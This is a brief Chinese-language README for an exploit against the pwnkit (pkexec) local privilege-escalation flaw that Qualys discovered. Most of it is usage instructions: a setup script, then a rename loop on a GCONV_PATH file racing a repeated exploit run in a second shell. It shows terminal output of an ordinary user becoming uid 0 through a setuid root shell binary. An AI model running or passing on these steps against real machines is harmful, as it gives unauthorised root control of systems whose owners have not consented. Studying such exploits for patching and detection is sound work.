
针对 pwnkit 漏洞 的利用程序, 该漏洞由 Qualys 团队发现。
此利用程序假设目标机器上存在 gcc。
$ id
uid=1001(ayrx) gid=1002(ayrx) groups=1002(ayrx),27(sudo)
$ ./setup.sh
在一个 bash 会话中运行以下命令:
while :; do mv "GCONV_PATH=./value" "GCONV_PATH=./value.bak"; mv "GCONV_PATH=./value.bak" "GCONV_PATH=./value"; done
在另一个 bash 会话中运行以下命令:
while :; do ./exploit; done
你最终将赢得竞争并获得一个 shell 二进制文件,该文件可赋予你
root 访问权限:
$ ls -lah shell
-rwsrwxrwx 1 root ayrx 16K Jan 26 08:57 shell
$ ./shell
# id
uid=0(root) gid=1002(ayrx) groups=1002(ayrx),27(sudo)
关于该技术的简短分析可参见我的 博客。